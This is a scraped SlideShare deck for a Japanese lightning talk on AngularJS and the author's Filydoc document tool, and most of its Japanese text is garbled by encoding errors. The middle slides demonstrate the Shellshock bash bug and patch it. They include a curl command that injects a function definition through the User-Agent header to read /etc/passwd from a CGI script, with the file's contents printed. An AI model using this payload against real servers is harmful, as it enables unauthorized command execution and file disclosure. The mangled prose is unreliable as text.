Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
AngularJS 
ά⏝஦౛(?) 
@kobayan_tokyo
⮬ᕫ⤂௓ 
Twitter: @kobayan_tokyo 
GitHub: kobake 
Web site: http://clock-up.jp 
ඖ䝀䞊䝮ᒇ 
⌧Webᒇ䚸⌧䝀䞊䝮ᒇᡭఏ䛔䚸⌧ㅮᖌ
HTML5䛷ఱ䛜䛷䛝䜛…䠛 
䜻䝱䞁䝞䝇䛸䛛䞉䞉 
䜹䝯䝷䛸䛛䞉䞉 
㡢䛸䛛䞉䞉 
P2P䛸䛛䞉䞉 
ຍ㏿ᗘ䛸䛛䞉䞉 
Storage䛸䛛䞉䞉
HTML5䛷ᗫṆ䛥䜜䜛䝍䜾 
ฟ඾䠖http://www.htmq.com/html5/002.shtml 
<acronym> <applet> <basefont> <bgsound> <big> <blink> <center> 
<di...
frame䝃䜲䝖䛾༴ᶵ 
http://homepage3.nifty.com/abe-hiroshi/
Filydoc䛸䛔䛖䜒䛾䜢స䜚䜎䛧䛯 
䝗䜻䝳䝯䞁䝖⟶⌮䝒䞊䝹 
http://filydoc.net/
AngularJS䜢౑䛖 
$location … URL䜢䝂䝙䝵䜛
AngularJS䜢౑䛖 
䛸䜚䛒䛘䛪䛹䛣䛛䛾䜈䜣䜢඲ㄞ䛧䛯䜘䛖䛺グ᠈ 
AngularJSධ㛛 | AngularJS 1.2 ᪥ᮏㄒ䝸䝣䜯䝺䞁䝇 | js STUDIO 
http://js.studio-kingdom.com/angul...
䛭䜣䛺䛣䛸䜘䜚bash䛜ᛧ䛔 
ฟ඾䠖http://japan.cnet.com/news/service/35054245/ 
> 䛂Bourne Again SHell䠄Bash䠅䛃䛻㔜኱䛺䝉䜻䝳䝸 
䝔䜱䝩䞊䝹䛜Ⓨぢ䛥䜜䛯䚹…䝝䝑䜹䞊䛿≉...
䛭䜣䛺䛣䛸䜘䜚bash䛜ᛧ䛔 
ฟ඾䠖https://x86-64.jp/blog/CVE-2014-6271 
$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' 
䜒䛧ฟຊ䛾୰䛻manuk...
ヨ䛧䛶䜏䛯 
$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' 
manuke 
Hi
ヨ䛧䛶䜏䛯 
$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' 
manuke 
Hi
䜏䜣䛺⬣䛧䛶䛟䜛(䖱﹏䈬) 
https://x86-64.jp/blog/CVE-2014-6271 
system()䜔㢮ఝ䛾㛵ᩘ䜢⏝䛔䛯CGI䝇䜽䝸䝥䝖䛿䚸OS䝁䝬䞁䝗ᐇ⾜䛾䛯䜑䛻 
bash䜢࿧䜃ฟ䛧䛶䛔䜛䛛䜒䛧䜜䜎䛫䜣䚹 
http:...
ᐇ䛿Filydoc䛿ෆ㒊ⓗ䛻grep࿧䜣䛷䛯䜚 
// ㉳ື䝁䝬䞁䝗䛾ᵓ⠏ 
$dir_path = DATA_ROOT; 
$cmd = "grep " 
. " " . "-R -i -n --" // recursive, ignore ...
䠄䠼䜵´䠅䝢䝱䞊 
䠄䠼䜵´䠅䝢䝱䞊
䠄䠼䜵´䠅䝢䝱䞊䠛 
⤖ㄽ䠖≉䛻ၥ㢟䛿䛺䛛䛳䛯
୍ᛂᐇ㦂 
xxx.cgi 
---------------------- 
#!/bin/sh 
echo "Content-Type: text/html" 
echo "" 
echo "test" 
------------------...
䠄䠼䜵´䠅䝢䝱䞊!!!!!!!!!!!! 
$ curl -A "() { :;}; echo Content-type:text/plain; 
echo; /bin/cat /etc/passwd " "http://xxx/xxx.cgi...
䛷䜒ᛧ䛔䛛䜙䠄䠼䜵´䠅䝢䝱䞊 
# yum update bash 
… 
=============================================== 
Updating: 
bash x86_64 4.1.2-15.el6...
䠄´䌔䠼䠅 
$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' 
bash: warning: AHO: ignoring function definition attempt 
bash...
䛚䜎䛡⛬ᗘ䛻 
Filydoc䛾⤂௓
䝗䜻䝳䝯䞁䝖ᩚ⌮䜢䜒䛳䛸㏿䛟㏿䛟 
䞉䝤䝻䜾…㐜䛔 
䞉wiki…㐜䛔
䝗䜻䝳䝯䞁䝖ᩚ⌮䜢䜒䛳䛸᪩䛟᪩䛟 
䞉䝤䝻䜾…㐜䛔 
䞉wiki…㐜䛔 
ఱᨾ䛛䠛
ఱᨾ㐜䛔䛾䛛䠛 
Web䛰䛛䜙䛥 
䞉䝛䝑䝖䝽䞊䜽㐜ᘏ䛜ᆅ࿡䛻䝇䝖䝺䝇 
䞉⦅㞟䜲䞁䝍䞊䝣䜵䞊䝇䛜䝃䞊䝡䝇౫Ꮡ 
(C)䜺䞁䝎䝮
30ಸ㏿䛔䝗䜻䝳䝯䞁䝖ᩚ⌮ 
(C)䜺䞁䝎䝮 
䝛䜲䝔䜱䝤䝣䜯䜲䝹…㏿䛔䠃ᰂ㌾
䝛䜲䝔䜱䝤䝣䜯䜲䝹᭱ᙉㄝ 
䞉䝛䝑䝖䝽䞊䜽㐜ᘏ䛸䛔䛖ᴫᛕ䛜䛺䛔 
䞉䝣䜷䝹䝎䛻䝫䜲䝫䜲⛣ື䛷䛝䜛 
䞉ዲ䛝䛺䜶䝕䜱䝍䛷䝫䜲䝫䜲⦅㞟䛷䛝䜛 
䞉ዲ䛝䛺䝒䞊䝹䛷䝫䜲䝫䜲ኚ᥮䛷䛝䜛 
䞉sed䛷⨨᥮䛸䛛䛷䛝䜛 
䞉git䛸䛛䛷䝫䜲䝫䜲⟶⌮䛷䛝䜛
ษᐇ䛺ሙ㠃 
䞉䝗䜻䝳䝯䞁䝖ᩘ䛜ᩘⓒ䛻㐩䛧䛯
స䛳䛯䜒䛾䠖Filydoc 
http://filydoc.net/ 
https://github.com/kobake/filydoc 
http://memo.clock-up.jp/ 
http://blog.clock-up.jp/e...
䝁䞁䝔䞁䝒⦅㞟㢼ᬒ
ᑐᛂ䝣䜷䞊䝬䝑䝖 
䞉Plain text 
䞉Markdown 
䞉Java 
䞉PHP
ᙉ䜏 
䞉䝛䜲䝔䜱䝤䝣䜯䜲䝹 
䞉䝣䜷䝹䝎䛜䛭䛾䜎䜎䝒䝸䞊ᵓ㐀䛻䛺䜛 
䞉䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷౑䛘䜛 
䞉඲ᩥ᳨⣴䚸䜽䜲䝑䜽䝣䜱䝹䝍 
䞉㜀ぴUX䜒䛭䛣䛭䛣㧗㏿ឤ䛜䛒䜛 
䞉䝟䞁䛟䛪
ᵓᡂ䛸䛛 
ゝㄒ䛺䛹 
䞉⏕PHP (䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷౑䛘䜛!!) 
䞉AngularJS 
㧗㏿໬ 
䞉䝒䝸䞊≧ែ䜢䝅䝸䜰䝷䜲䝈䛧䛶䜎䜛䛳䛸䜻䝱䝑䝅䝳
᭱㏆㏣ຍ䛧䛯ᶵ⬟ 
䞉URL⮬ື䝸䞁䜽&⮬ື䝍䜲䝖䝹⾲♧ 
䞉GitHub䝻䜾䜲䞁䛧䛶䝁䞁䝔䞁䝒┤⦅㞟
ㄢ㢟(issues) 
䞉Html format support 
䞉Plain text support (῭) 
䞉Editing content on web browser (῭)
㏣ຍᢏ⾡ 
䞉SQLite (URL䝍䜲䝖䝹䛾䜻䝱䝑䝅䝳䛻౑⏝) 
䚷… 䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷ື䛟䛛୙Ᏻ䛺䛾䛷 
䚷䚷䚷௦᭰ᡭẁ䜒‽ഛணᐃ䚹
PHP䛾ᙉ䜏 
䞉⤖ᒁ䛹䛣䛾䝃䞊䝞䛷䜒ᐇ⾜䛷䛝䜛
䛤Ύ⫈ 
䛒䜚䛜䛸䛖䛤䛦䛔䜎䛧䛯
Upcoming SlideShare
Loading in …5
×

Angular js活用事例:filydoc

HTML5的な

  • Be the first to comment

  • Be the first to like this

Angular js活用事例:filydoc

  1. 1. AngularJS ά⏝஦౛(?) @kobayan_tokyo
  2. 2. ⮬ᕫ⤂௓ Twitter: @kobayan_tokyo GitHub: kobake Web site: http://clock-up.jp ඖ䝀䞊䝮ᒇ ⌧Webᒇ䚸⌧䝀䞊䝮ᒇᡭఏ䛔䚸⌧ㅮᖌ
  3. 3. HTML5䛷ఱ䛜䛷䛝䜛…䠛 䜻䝱䞁䝞䝇䛸䛛䞉䞉 䜹䝯䝷䛸䛛䞉䞉 㡢䛸䛛䞉䞉 P2P䛸䛛䞉䞉 ຍ㏿ᗘ䛸䛛䞉䞉 Storage䛸䛛䞉䞉
  4. 4. HTML5䛷ᗫṆ䛥䜜䜛䝍䜾 ฟ඾䠖http://www.htmq.com/html5/002.shtml <acronym> <applet> <basefont> <bgsound> <big> <blink> <center> <dir> <font> <frame> <frameset> <isindex> <listing> <marquee> <nobr> <noembed> <noframes> <plaintext> <rb> <spacer> <strike> ation: line-through䛷ᣦᐃ <tt> <u> <xmp>
  5. 5. frame䝃䜲䝖䛾༴ᶵ http://homepage3.nifty.com/abe-hiroshi/
  6. 6. Filydoc䛸䛔䛖䜒䛾䜢స䜚䜎䛧䛯 䝗䜻䝳䝯䞁䝖⟶⌮䝒䞊䝹 http://filydoc.net/
  7. 7. AngularJS䜢౑䛖 $location … URL䜢䝂䝙䝵䜛
  8. 8. AngularJS䜢౑䛖 䛸䜚䛒䛘䛪䛹䛣䛛䛾䜈䜣䜢඲ㄞ䛧䛯䜘䛖䛺グ᠈ AngularJSධ㛛 | AngularJS 1.2 ᪥ᮏㄒ䝸䝣䜯䝺䞁䝇 | js STUDIO http://js.studio-kingdom.com/angularjs/guide/introduction AngularJS Startup Advent Calendar 2013 - Qiita http://qiita.com/advent-calendar/2013/angularjs-startup ౫Ꮡᛶὀධ䛸䛛ㅖ䚻ຮᙉ䛻䛺䜚䜎䛧䛯䚹
  9. 9. 䛭䜣䛺䛣䛸䜘䜚bash䛜ᛧ䛔 ฟ඾䠖http://japan.cnet.com/news/service/35054245/ > 䛂Bourne Again SHell䠄Bash䠅䛃䛻㔜኱䛺䝉䜻䝳䝸 䝔䜱䝩䞊䝹䛜Ⓨぢ䛥䜜䛯䚹…䝝䝑䜹䞊䛿≉ู䛻స ᡂ䛧䛯ኚᩘ䜢⏝䛔䛶䝉䜻䝳䝸䝔䜱䝩䞊䝹䜢✺䛝䚸 䝅䜵䝹䝁䝬䞁䝗䜢ᐇ⾜䛷䛝䜛
  10. 10. 䛭䜣䛺䛣䛸䜘䜚bash䛜ᛧ䛔 ฟ඾䠖https://x86-64.jp/blog/CVE-2014-6271 $ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' 䜒䛧ฟຊ䛾୰䛻manuke䛜ྵ䜎䜜䛶䛔䛯䜙䚸䛭䛾䝩䝇䝖䛿௒ᅇⓎ⾲ 䛥䜜䛯⬤ᙅᛶ䛻ᑐ䛧䛶༴㝤䛺≧ែ䛷䛩䚹
  11. 11. ヨ䛧䛶䜏䛯 $ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' manuke Hi
  12. 12. ヨ䛧䛶䜏䛯 $ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' manuke Hi
  13. 13. 䜏䜣䛺⬣䛧䛶䛟䜛(䖱﹏䈬) https://x86-64.jp/blog/CVE-2014-6271 system()䜔㢮ఝ䛾㛵ᩘ䜢⏝䛔䛯CGI䝇䜽䝸䝥䝖䛿䚸OS䝁䝬䞁䝗ᐇ⾜䛾䛯䜑䛻 bash䜢࿧䜃ฟ䛧䛶䛔䜛䛛䜒䛧䜜䜎䛫䜣䚹 http://techblog.clara.jp/2014/09/bash-vulnerability-vol1-verification/ ᝿ᐃ౛䛸䛧䛶䛿䚸Apache䛺䛹䛾Web䝃䞊䝞ୖ䛻䛒䜛 cgi ➼䜈䚸ၥ㢟䛾䝁䞊 䝗䜢⎔ቃኚᩘ䛸䛧䛶ᘬ䛝Ώ䛩䛸䚸௵ព䛾䝁䝬䞁䝗䛜ᐇ⾜䛷䛝䛶䛧䜎䛖䛣䛸䛷䛧䜗 䛖䛛䚹
  14. 14. ᐇ䛿Filydoc䛿ෆ㒊ⓗ䛻grep࿧䜣䛷䛯䜚 // ㉳ື䝁䝬䞁䝗䛾ᵓ⠏ $dir_path = DATA_ROOT; $cmd = "grep " . " " . "-R -i -n --" // recursive, ignore case, line number . " " . escapeshellarg($keyword) . " " . escapeshellarg($dir_path); // grep㉳ື $handle = popen($cmd, 'r'); $webpathItems = array();
  15. 15. 䠄䠼䜵´䠅䝢䝱䞊 䠄䠼䜵´䠅䝢䝱䞊
  16. 16. 䠄䠼䜵´䠅䝢䝱䞊䠛 ⤖ㄽ䠖≉䛻ၥ㢟䛿䛺䛛䛳䛯
  17. 17. ୍ᛂᐇ㦂 xxx.cgi ---------------------- #!/bin/sh echo "Content-Type: text/html" echo "" echo "test" ----------------------
  18. 18. 䠄䠼䜵´䠅䝢䝱䞊!!!!!!!!!!!! $ curl -A "() { :;}; echo Content-type:text/plain; echo; /bin/cat /etc/passwd " "http://xxx/xxx.cgi" root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync …
  19. 19. 䛷䜒ᛧ䛔䛛䜙䠄䠼䜵´䠅䝢䝱䞊 # yum update bash … =============================================== Updating: bash x86_64 4.1.2-15.el6_5.1 updates 905 k =============================================== … Upgrade 1 Package(s) Total download size: 905 k Is this ok [y/N]: y
  20. 20. 䠄´䌔䠼䠅 $ AHO='() { baka; }; echo manuke' bash -c 'echo Hi' bash: warning: AHO: ignoring function definition attempt bash: error importing function definition for `AHO' Hi
  21. 21. 䛚䜎䛡⛬ᗘ䛻 Filydoc䛾⤂௓
  22. 22. 䝗䜻䝳䝯䞁䝖ᩚ⌮䜢䜒䛳䛸㏿䛟㏿䛟 䞉䝤䝻䜾…㐜䛔 䞉wiki…㐜䛔
  23. 23. 䝗䜻䝳䝯䞁䝖ᩚ⌮䜢䜒䛳䛸᪩䛟᪩䛟 䞉䝤䝻䜾…㐜䛔 䞉wiki…㐜䛔 ఱᨾ䛛䠛
  24. 24. ఱᨾ㐜䛔䛾䛛䠛 Web䛰䛛䜙䛥 䞉䝛䝑䝖䝽䞊䜽㐜ᘏ䛜ᆅ࿡䛻䝇䝖䝺䝇 䞉⦅㞟䜲䞁䝍䞊䝣䜵䞊䝇䛜䝃䞊䝡䝇౫Ꮡ (C)䜺䞁䝎䝮
  25. 25. 30ಸ㏿䛔䝗䜻䝳䝯䞁䝖ᩚ⌮ (C)䜺䞁䝎䝮 䝛䜲䝔䜱䝤䝣䜯䜲䝹…㏿䛔䠃ᰂ㌾
  26. 26. 䝛䜲䝔䜱䝤䝣䜯䜲䝹᭱ᙉㄝ 䞉䝛䝑䝖䝽䞊䜽㐜ᘏ䛸䛔䛖ᴫᛕ䛜䛺䛔 䞉䝣䜷䝹䝎䛻䝫䜲䝫䜲⛣ື䛷䛝䜛 䞉ዲ䛝䛺䜶䝕䜱䝍䛷䝫䜲䝫䜲⦅㞟䛷䛝䜛 䞉ዲ䛝䛺䝒䞊䝹䛷䝫䜲䝫䜲ኚ᥮䛷䛝䜛 䞉sed䛷⨨᥮䛸䛛䛷䛝䜛 䞉git䛸䛛䛷䝫䜲䝫䜲⟶⌮䛷䛝䜛
  27. 27. ษᐇ䛺ሙ㠃 䞉䝗䜻䝳䝯䞁䝖ᩘ䛜ᩘⓒ䛻㐩䛧䛯
  28. 28. స䛳䛯䜒䛾䠖Filydoc http://filydoc.net/ https://github.com/kobake/filydoc http://memo.clock-up.jp/ http://blog.clock-up.jp/entry/2014/07/07/filydoc
  29. 29. 䝁䞁䝔䞁䝒⦅㞟㢼ᬒ
  30. 30. ᑐᛂ䝣䜷䞊䝬䝑䝖 䞉Plain text 䞉Markdown 䞉Java 䞉PHP
  31. 31. ᙉ䜏 䞉䝛䜲䝔䜱䝤䝣䜯䜲䝹 䞉䝣䜷䝹䝎䛜䛭䛾䜎䜎䝒䝸䞊ᵓ㐀䛻䛺䜛 䞉䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷౑䛘䜛 䞉඲ᩥ᳨⣴䚸䜽䜲䝑䜽䝣䜱䝹䝍 䞉㜀ぴUX䜒䛭䛣䛭䛣㧗㏿ឤ䛜䛒䜛 䞉䝟䞁䛟䛪
  32. 32. ᵓᡂ䛸䛛 ゝㄒ䛺䛹 䞉⏕PHP (䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷౑䛘䜛!!) 䞉AngularJS 㧗㏿໬ 䞉䝒䝸䞊≧ែ䜢䝅䝸䜰䝷䜲䝈䛧䛶䜎䜛䛳䛸䜻䝱䝑䝅䝳
  33. 33. ᭱㏆㏣ຍ䛧䛯ᶵ⬟ 䞉URL⮬ື䝸䞁䜽&⮬ື䝍䜲䝖䝹⾲♧ 䞉GitHub䝻䜾䜲䞁䛧䛶䝁䞁䝔䞁䝒┤⦅㞟
  34. 34. ㄢ㢟(issues) 䞉Html format support 䞉Plain text support (῭) 䞉Editing content on web browser (῭)
  35. 35. ㏣ຍᢏ⾡ 䞉SQLite (URL䝍䜲䝖䝹䛾䜻䝱䝑䝅䝳䛻౑⏝) 䚷… 䝣䝒䞊䛾䝺䞁䝍䝹䝃䞊䝞䛷ື䛟䛛୙Ᏻ䛺䛾䛷 䚷䚷䚷௦᭰ᡭẁ䜒‽ഛணᐃ䚹
  36. 36. PHP䛾ᙉ䜏 䞉⤖ᒁ䛹䛣䛾䝃䞊䝞䛷䜒ᐇ⾜䛷䛝䜛
  37. 37. 䛤Ύ⫈ 䛒䜚䛜䛸䛖䛤䛦䛔䜎䛧䛯

    Be the first to comment

    Login to see the comments

HTML5的な

Views

Total views

1,190

On Slideshare

0

From embeds

0

Number of embeds

57

Actions

Downloads

3

Shares

0

Comments

0

Likes

0

×